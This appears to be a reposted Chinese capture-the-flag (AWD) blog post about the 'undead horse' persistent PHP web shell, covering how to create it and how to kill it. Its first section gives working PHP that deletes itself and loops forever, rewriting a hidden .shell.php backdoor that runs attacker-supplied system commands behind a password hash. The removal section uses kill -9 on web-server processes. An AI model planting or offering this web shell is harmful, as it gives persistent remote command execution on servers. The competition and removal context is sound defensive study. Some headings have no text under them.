0x00 创建
md5加密密码:
代码:
<?phpignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file = '.shell.php';$code = '<?php if(md5($_GET["pass"])=="2591c98b70119fe624898b1e424b5e91"){@system($_POST[cmd]);} ?>';while (1){file_put_contents($file,$code);}?>
触发执行:
0x01 查看
权限:
内容:
执行:
0x02 查杀
root用户角度的查杀:
1、杀掉进程
ps aux | grep www-data | awk '{print $2}' | xargs kill -92、重启服务
重启web服务。
其他用户的查杀:
在awd中,ctf用户没有权限,不能重启服务,而且,以ctf的用户来杀进程和条件竞争也是不可行的。
(不死马会先创建,然后被删除,在创建到被删除的过程中会可利用。)
最简单的方式就是以www-data用户的角度通过杀进程来实现查杀。
1、杀掉进程:
<?php@system("ps -aux | grep www-data | awk '{print $2}' | xargs kill -9");?>
2、条件竞争:
不推荐,如果不死马中没有调用usleep()函数,进行延时的话,条件竞争是gg的。
作者:RJ45
原文链接:https://rj45mp.github.io/bushima/
文章来源: http://mp.weixin.qq.com/s?__biz=MzU2NzY5MzI5Ng==&mid=2247491751&idx=1&sn=d212988fe1ec9f21758f0520c365b728&chksm=fc9bfa38cbec732eaa280cb20a6c05c6d07c28db8f7f6efdca7035b539bed6226e95dbe20fb8#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh